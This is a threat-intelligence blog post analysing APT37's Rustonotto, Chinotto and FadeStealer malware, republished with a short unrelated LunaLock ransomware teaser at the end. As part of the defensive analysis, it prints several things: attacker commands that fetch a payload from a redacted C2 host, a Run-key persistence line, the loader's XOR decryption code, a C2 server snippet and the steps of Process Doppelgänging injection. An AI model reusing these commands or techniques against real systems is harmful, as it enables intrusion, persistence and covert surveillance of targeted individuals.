IntroductionAPT37 (also known as ScarCruft, Ruby Sleet, and Velvet Chollima) is a North Korean-aligned threat actor active since at least 2012. APT37 primarily targets South Korean individuals connected to the North Korean regime or involved in human rights activism, leveraging custom malware and adopting emerging technologies.In recent campaigns, APT37 utilizes a single command-and-control (C2) server to orchestrate all components of their malware arsenal, including a Rust-based backdoor that ThreatLabz dubbed Rustonotto (also known as CHILLYCHINO), a PowerShell-based malware known as Chinotto, and FadeStealer. Rustonotto is a newly identified backdoor in use since June 2025. Chinotto is a well-documented PowerShell backdoor that has been in use since 2019. FadeStealer, first discovered in 2023, is a surveillance tool that records keystrokes, captures screenshots and audio, monitors devices and removable media, and exfiltrates data via password-protected RAR archives.In this blog post, Zscaler ThreatLabz delves into the tactics and tools used by APT37. The technical analysis explores APT37's sophisticated tactics, including spear phishing, Compiled HTML Help (CHM) file delivery, and Transactional NTFS (TxF) for stealthy code injection.Key TakeawaysAPT37 is a North Korean-aligned threat actor active since at least 2012 that primarily targets individuals connected to the North Korean regime or involved in human rights activism.In recent campaigns, APT37 utilizes a single command-and-control (C2) server to orchestrate all components of their malware arsenal, including the Rust-based backdoor we named Rustonotto, the PowerShell-based Chinotto malware, and FadeStealer.FadeStealer, first identified in 2023, is a surveillance tool designed to log keystrokes, capture screenshots and audio, track devices and removable media, and exfiltrate data through password-protected RAR archives. FadeStealer leverages HTTP POST and Base64 encoding for communication with its command-and-control (C2) server.APT37 utilizes Windows shortcut files and Windows help files as initial infection vectors.Rustonotto, active since June 2025, is a Rust-compiled malware, representing the first known instance of APT37 leveraging Rust-based malware to target Windows systems.Using simple backdoors in the initial stage, the threat actor deployed FadeStealer via a Python-based infection chain.OverviewS2W published a comprehensive report on the same threat actor, detailing PubNub-based communication malware and the deployment of VCD ransomware. In this blog post, ThreatLabz expands on these findings and highlights the infection chain observed, along with the C2 operations that orchestrate the full tradecraft of this threat actor.ThreatLabz’s latest findings suggest that APT37 utilized the Rust programming language to create a lightweight backdoor we named Rustonotto, which has basic functionality for executing Windows commands and sending the results to a threat actor-controlled server. While Rustonotto may appear simplistic, the use of Rust highlights the group's ongoing effort to adopt modern languages and potentially support multi-platform attacks. APT37 also employed a Python-based loader implementing the Process Doppelgänging code injection technique to deploy a custom-built stealer designed for data exfiltration.ThreatLabz collaborated with the Korea National Police Agency (KNPA) by providing technical analysis to support their investigation of APT37.Technical Analysis Attack chainThreatLabz reconstructed the APT37 infection chain that begins with an initial compromise via a Windows shortcut or a Windows help file, followed by Chinotto dropping FadeStealer through a sophisticated infection process. The attack chain is depicted in the figure below.Figure 1: Full infection chain involving Chinotto, Rustonotto, and FadeStealer.Windows shortcut and RustonottoIn one campaign, APT37 utilizes a Windows shortcut file. When this shortcut file (MD5: b9900bef33c6cc9911a5cd7eeda8e093) is launched, a malicious PowerShell script, Chinotto, is invoked that extracts an embedded decoy and payload using predefined markers. The steps outlined below detail the infection process initiated when the victim executes Chinotto.Scans %temp% and the current working directory for its own Windows shortcut file, validating its exact size (6,032,787 bytes) to ensure the correct file is processed.Reads the Windows shortcut, converts the byte values to ASCII, and extracts two hex-encoded payloads delimited by the markers AEL (first payload start), BEL (second payload start), and EOF (end of file marker).Converts the first hex payload to binary and writes it as C:\ProgramData\NKView.hwp, then launches it as a decoy document.Decodes the second payload and writes it as C:\ProgramData\3HNoWZd.exe, which functions as the main executable.Creates a scheduled task named MicrosoftUpdate, configured to execute 3HNoWZd.exe every 5 minutes using schtasks.The decoy document is a Hangul Word Processor (HWP) file titled “Two Perspectives on North Korea in South Korean Society”, which was last modified on June 11, 2025.Figure 2: Example decoy document dropped by an APT37 Windows shortcut file.The dropped payload is Rustonotto, which is a Rust-compiled binary (MD5 7967156e138a66f3ee1bfce81836d8d0). Rustonotto receives Base64-encoded Windows commands and returns the execution results also in a Base64-encoded format. The steps below illustrate the sequence of Rustonotto’s behavior, specifically focusing on its C2 communication.Establishes an HTTP connection to the C2 server with the U= HTTP query parameter.Makes HTTP requests to the C2 server to fetch commands.Executes the commands received.Captures the command output and sends the result back to the C2 server with the R= HTTP query parameter.Windows help file and PowerShell-based payloadIn another campaign, the threat actor used a Windows help file (CHM) to deliver malware, a method that ThreatLabz has observed APT37 use before. In this case, the victim was sent a RAR file named 2024-11-22.rar. Inside the RAR archive were two files: a password-protected ZIP archive called KT그룹 채용 (translated as KT Job Description) and a malicious Windows help file named Password.chm. (which was disguised as a document containing the password for the ZIP archive). The malicious CHM file, when opened, creates a registry value under the Run key to trigger the download and execution of an HTML Application (HTA) file from the threat actor’s server each time the current user logs on. The example below shows how the CHM file is configured to perform this action: The HTA file (1.html) downloaded by the CHM contains a malicious PowerShell script that acts as a backdoor, allowing the threat actor to control the infected computer remotely. The backdoor known as Chinotto is capable of performing various tasks, such as transferring files, executing commands, modifying the registry, creating scheduled tasks, and more. When Chinotto launches, it creates a unique victim identifier by combining the computer name and the username, which Chinotto uses when communicating with the C2 server. Chinotto connects to the same C2 server URL previously associated with Rustonotto.To avoid running the malware more than once on the same machine, Chinotto generates a file named %TEMP%\jMwVrHdPtpv as an execution marker. Every 5 seconds, Chinotto checks the threat actor’s C2 server for new instructions via HTTP POST requests, sending the victim ID (formatted as U=[victim ID]). Chinotto then receives commands from the server, which are Base64 decoded, and executed on the infected system. The table below shows the commands supported by Chinotto, along with their description.CommandsDescriptionFINFOCollects file information (name, size, timestamps, path) from a specified directory, saves it to a CSV file, and uploads the CSV to the C2 server.DIRUPCompresses the contents of a specified directory into a ZIP archive and uploads the ZIP to the C2 server.SFILEUploads a specified file to the C2 server.DOWNFDownloads a file from a given URL and saves it to a specified path.CURLCUses curl to download a file from a URL and saves it to a specified path.REGEDModifies the Windows registry at a specified location, setting the name and value.TASKACreates a scheduled task to run a specified command at regular intervals.ZIPEXExtracts the contents of a ZIP archive to a specified destination.RENAMRenames a specified file or directory.DELETDeletes a specified file or directory.Table 1: Commands supported by the Chinotto backdoor.When Chinotto completes execution, it sends a Base64-encoded done message back to the C2 server with the R= HTTP query parameter.Transacted injectionThe threat actor's hands-on-keyboard activities with the implanted Chinotto variant involved delivering malicious payloads packaged in Microsoft Cabinet (.CAB) files. These payloads, equipped with Python-based launchers, were extracted and executed upon delivery. The commands used to deliver and execute the payloads are outlined in the table below.Delivered commandsDescriptioncurl http://[redacted]/images/test/wonder.dat -o "c:\programdata\wonder.cab"Fetches the Microsoft Cabinet (CAB) file payload from the C2 server.expand c:\programdata\wonder.cab -F:* c:\programdataExtracts the contents of the .CAB file to the specified directory.del /f /q c:\programdata\wonder.cabDeletes the .CAB file to remove evidence.reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v TeleUpdate /d "c:\programdata\tele_update\tele_update.exe c:\programdata\tele_update\tele.conf c:\programdata\tele_update\tele.dat" /fAdds a registry entry to enable automatic execution at system startup or login.c:\programdata\telegram_update\tele_update.exe c:\programdata\telegram_update\tele.conf c:\programdata\telegram_update\tele.datLaunches FadeStealer with its associated configuration and data files.Table 2: Example APT37 commands executed to deliver FadeStealer.Each file executed during the threat actor’s hands-on-keyboard activity includes three components: A legitimate Python module (tele_update.exe).A compiled Python module (tele.conf) that decrypts and loads FadeStealer from a file named tele.dat.The FadeStealer payload (tele.dat), Base64-encoded and XOR encrypted.The compiled Python module, created on 2025-04-01 05:42:03, is internally named TransactedHollowing.py, suggesting the use of a technique for stealthily injecting and executing arbitrary code within a legitimate Windows process.The script is designed to process a single input file containing a Base64-encoded payload. The script decodes the payload and applies a custom XOR-based decryption routine to extract a Windows executable. The decrypted executable is intended for injection into a target process. The following code demonstrates the decryption routine used to unpack the payload.def decrypt_custom_encoded_file(file_path):
try:
# Open the file in binary mode and read its content
with open(file_path, "rb") as file:
encoded_data = file.read()
# Decode the content from base64
decoded_data = base64.b64decode(encoded_data)
# Read offset and update it
offset = decoded_data[0]
offset += 1
# Get key length and update offset
key_length = decoded_data[offset]
offset += 1
# Extract the XOR key
xor_key = decoded_data[offset : offset + key_length]
offset += key_length
# Decrypt the rest of the data using XOR with the key
decrypted = bytes([
decoded_data[i] ^ xor_key[(i - offset) % key_length]
for i in range(offset, len(decoded_data))
])
return decrypted After unpacking the original payload, the Python script employs the Process Doppelgänging technique to inject the payload into a legitimate Windows process. The technique involves the following steps:Transacted file creation and section object setupThe script uses Windows Transactional NTFS (TxF) APIs (e.g., CreateFileTransactedW) to create a new file within a transaction context.The decrypted Portable Executable (PE) payload is written to the transacted file.The function NtCreateSection is called to create a memory section object, using the transacted file as the backing store for the payload's memory.The transaction is rolled back (RollbackTransaction), while preserving the section object in memory.The temporary file handle is closed, and the file is deleted, leaving no trace of the payload on disk.Suspended process creationThe script randomly selects a legitimate Windows system executable from a predefined list. Examples include: calc.exe, msinfo32.exe, svchost.exe, GamePanel.exe, UserAccountControlSettings.exe, and control.exe.The script creates a new process associated with the chosen executable in a suspended state.Section mapping, context manipulation, and executionThe section object containing the payload is mapped into the address space of the suspended process using NtMapViewOfSection.The script modifies the thread context of the suspended process (via GetThreadContext / SetThreadContext or their Wow64 equivalents) to redirect execution to the payload's entry point.The Process Environment Block (PEB) of the target process is updated to reflect the new image base address associated with the injected payload.The main thread of the process is resumed (ResumeThread), triggering the execution of the injected payload.The decrypted malware is FadeStealer, the same data-theft tool previously documented by AhnLab. FadeStealer periodically gathers files from the infected system, compresses them into password-protected RAR archives, and transmits them to a C2 server. When launched, FadeStealer creates working directories under the %TEMP%\VSTelems_Fade\ folder. FadeStealer has two main functions: automatically exfiltrating sensitive files and sending specific files as directed by commands specified by the threat actor. FadeStealer file stealing commandsOnce connected to the C2 server, FadeStealer receives Base64-encoded commands specifying a file path and a search pattern, separated by the | character. These commands direct the malware to gather target files based on the criteria provided. After collecting the files, FadeStealer creates a timestamped RAR archive (e.g., data_YYYY_MM_DD-HH_MM_SS.rar) and sends it back to the C2 server. Some example commands are listed below:CommandDescription C:\Users\|*.docCollect all Word documents from the Users directory.C:\Documents\|*.*Collect all files from the Documents folder.D:\|*.pdfCollect all PDF files from the D: drive.Table 3: Example commands supported by FadeStealer.FadeStealer surveillanceIn surveillance mode, FadeStealer operates multiple threads, each dedicated to monitoring and collecting specific types of data from the infected system. These threads function independently to capture keystrokes, screenshots, audio recordings, and file content from connected devices.In the table below, the capabilities, collection frequency, file naming patterns, and storage locations of the malware are listed.CapabilitiesFrequencyFiles CollectedDirectoryRecords all keystrokesReal-timekey_YYYY_MM_DD.log%TEMP%\VSTelems_Fade\NgenPdbk\Captures screen imagesEvery 30 secYYYY_MM_DD-HH_MM_SS.jpg%TEMP%\VSTelems_Fade\NgenPdbc\Records microphone audio5-min sessionsYYYY_MM_DD-HH_MM_SS.wav%TEMP%\VSTelems_Fade\NgenPdbm\Monitors for USB devicesEvery 1 hourusb_YYYY_MM_DD-HH_MM_SS.rar%TEMP%\VSTelems_FadeOut\Monitors cameras/portable devicesEvery 1 hour[DeviceName]_YYYY_MM_DD-HH_MM_SS.rar%TEMP%\VSTelems_FadeIn\Table 4: Surveillance capabilities and corresponding files associated with FadeStealer. FadeStealer compiles all the collected data into a RAR archive every hour, using a naming format like watch_YYYY_MM_DD-HH_MM_SS.rar. This archive includes files stored in the main directory (%TEMP%\VSTelems_Fade\), which contain keylogging data, screenshots, audio recordings, and captured files. A separate thread is responsible for uploading these archives to the C2 server.To ensure timely exfiltration, another thread actively monitors and identifies archived RAR files every 10 seconds, sending them to the C2 server upon detection.In the table below, the source directories, archive types, and the contents of the collected data are outlined.Source DirectoryArchive TypesContent%TEMP%\VSTelems_Fade\watch_YYYY_MM_DD-HH_MM_SS.rarHourly surveillance data consolidated (keylogging, screenshots, audio).%TEMP%\VSTelems_FadeOut\usb_YYYY_MM_DD-HH_MM_SS.rarUSB device contents collected when inserted.%TEMP%\VSTelems_FadeIn\[DeviceName]_YYYY_MM_DD-HH_MM_SS.rarMTP-enabled devices such as smartphones, cameras, and media player contents gathered during monitoring.Any locationdata_YYYY_MM_DD-HH_MM_SS.rarFiles collected via remote commands.Table 5: Filenames and paths used for surveillance by FadeStealer.When sending files, FadeStealer uses HTTP POST requests with multipart form data, specifying myboundary as the boundary name. Additionally, when creating a RAR archive, FadeStealer utilizes the hardcoded password NaeMhq[d]q to encrypt the RAR content and employs a custom RAR.exe tool extracted from its embedded resources.C2 serverThe threat actor leveraged vulnerable web servers to act as C2 servers for managing malware operations. The C2 PHP script used by APT37 is a lightweight and file-based backend, facilitating communication between the threat actor and the malware implants. The C2 server enables command delivery, result collection, and file uploads, all organized within a single JSON file (info).Using this simple yet effective script, the threat actor controlled the entire suite of malware tools used in the campaign. This included Rustonotto, Chinotto, and FadeStealer, all of which utilized the same Base64-encoded format for communication. While some malware variants featured slight differences in command structures, the C2 server PHP script provided unified and streamlined control over the entire malware toolset. The figure below illustrates how the C2 server functioned as a central hub for delivering commands, collecting results, and handling uploads across the different malware components in the campaign.Figure 3: APT37 C2 server architecture for Rustonotto, Chinotto, and FadeStealer.The APT37 C2 server maintains two arrays: a parent array for storing results received from the malware implant and a child array for storing commands issued by the threat actor. The code sample below demonstrates how the APT37 C2 server initializes its operation.…
if (!file_exists("info"))
{
file_put_contents("info", '{"parent" : [{"id" : "", "text" : ""}], "child" : [{"id" : "", "text" : ""}]}');
}
$jsonStored = '';
$jsonStored = json_decode(file_get_contents("info"));
…The APT37 C2 server handles incoming HTTP requests differently depending on whether they originate from the threat actor or the malware implant. Requests are processed based on specific types and associated parameters, as outlined in the table below.Request TypeParameterDescriptionGET/POSTU=parentWhen the threat actor sends the query string U=parent, the C2 sends back the entire parent array, containing results from the clients. After delivering the response, the C2 resets the parent array to empty.GETU=&C=When the threat actor issues a command for a specific client, the Base64-encoded command is decoded and stored in the child array under the client’s ID. If the entry already exists, it is updated; otherwise, a new entry is created. The command is delivered to the client during its next poll and then cleared from the store.POSTU=&R=When a client sends back a result, the result is Base64-decoded and stored in the parent array under the client’s ID. If the entry already exists, it is updated; otherwise, a new entry is created. The threat actor can later retrieve these results using the query string U=parent.POSTU=&_file=When a client uploads a file, it is saved in the current directory with a filename prefixed by the client’s ID. The final filename format is _. If the file already exists, the data is appended.GET/POSTU=When a client polls for commands without sending a result or file, the script checks the child array for pending commands. If a command is found, it is delivered and cleared. If no command exists, the script checks the parent array. If no result is present, it responds with a default handshake message ("SEVMTw==", Base64 for "HELLO").Table 6: APT37 C2 server HTTP parameters and their corresponding purposes.The threat actor retrieves exfiltrated files from the compromised machine by issuing a direct GET request to the C2 server, leveraging prior knowledge of the client ID and the specific file name.
Victim ProfileOur findings revealed that several victims of this attack were located in South Korea. While the exact identities of the victims remain unclear due to limited available information, they do not appear to be associated with enterprises or government organizations. Based on the decoy content employed in the attack, ThreatLabz assesses with medium confidence that the intended targets include individuals linked to the North Korean regime or involved in South Korean political and/or diplomatic affairs.ConclusionAPT37 continues to prove its adaptability and proficiency by utilizing advanced tools and tactics to achieve its objectives. By incorporating new technologies alongside refined social engineering techniques, the group is able to effectively exfiltrate sensitive information and conduct targeted surveillance on individuals of interest. This malware cluster leveraged by APT37 has demonstrated persistent activity over the years and continues to undergo regular improvements.Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to APT37's campaign at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for this threat.Figure 4: Zscaler Cloud Sandbox report for FadeStealer.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to this threat at various levels with the following threat names:Win32.Backdoor.ChinottoWin32.Trojan.Apt37.LZWin32.Downloader.FadeStealerIndicators Of Compromise (IOCs)MD5File nameb9900bef33c6cc9911a5cd7eeda8e093N/A7967156e138a66f3ee1bfce81836d8d03HNoWZd.exe.bin77a70e87429c4e552649235a9a2cf11awonder.dat04b5e068e6f0079c2c205a42df8a3a84tele.confd2b34b8bfafd6b17b1cf931bb3fdd3dbtele.dat3d6b999d65c775c1d27c8efa615ee5202024-11-22.rar89986806a298ffd6367cf43f36136311Password.chm4caa44930e5587a0c9914bda9d240acc1.html MITRE ATT&CK FrameworkIDTacticDescriptionT1566.001Phishing: Spearphishing AttachmentThe threat actor delivers a malicious archive file to victims via spear phishing.T1059.003Command and Scripting Interpreter: Windows Command ShellThe Windows commands are launched by the CHM file when the Chinotto malware is delivered to the victim.T1059.007Command and Scripting Interpreter: JavaScriptThe JavaScript embedded HTA file is launched at the initial stage of the infection.T1053.005Scheduled Task/Job: Scheduled TaskA Windows Task Scheduler entry named MicrosoftUpdate was created for persistence using a malicious shortcut fileT1204.001User Execution: Malicious LinkThe malicious Windows shortcut file was delivered to the victim.T1547.001Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderThe malicious CHM file creates a Run registry named OnedriveStandaloneUpdater for persistence.T1055.013Process Injection: Process DoppelgängingUsing Python code, the malware injects malicious code into the legitimate process using Windows Transactional NTFS (TxF).T1036.003Masquerading: Rename Legitimate UtilitiesThe legitimate Python module was renamed as tele_update.exe.T1036.004Masquerading: Masquerade Task or ServiceThe malware creates Windows services or registry keys that impersonate legitimate services, such as OneDrive or Windows Update.T1218.005System Binary Proxy Execution: MshtaThe malware exploits mshta.exe to execute malicious .hta files as a proxy.T1056.001Input Capture: KeyloggingFadeStealer collects the user's key strokes.T1113Screen CaptureFadeStealer takes screenshots of the victim’s screen.T1123Audio CaptureFadeStealer records microphone audio.T1025Data from Removable MediaFadeStealer collects files from connected removable media devices.T1560.001Archive Collected Data: Archive via UtilityFadeStealer uses an embedded RAR utility to collect and compress data for exfiltration.T1071.001Application Layer Protocol: Web ProtocolsRustonotto, Chinotto, and FadeStealer use HTTP communication for backdoor operations.T1132.001Data Encoding: Standard EncodingRustonotto and Chinotto use Base64 encoding when sending data.T1041Exfiltration Over C2 ChannelFadeStealer exfiltrates collected data through the C2 channel.
The post APT37 Targets Windows with Rust Backdoor and Python Loader appeared first on Security Boulevard.
Security researchers first observed LunaLock in early September 2025, a sophisticated ransomware strain targeting independent illustrators and digital artists. Leveraging compromised credentials and social engineering, the group behind LunaLock has zeroed in on a niche marketplace—Artists & Clients—where freelance creators exchange custom commissions. Initial intrusion involved spear-phishing campaigns disguised as royalty notifications, enticing victims to […]
The post LunaLock Ransomware Attacking Artists to Steal and Encrypt Data appeared first on Cyber Security News.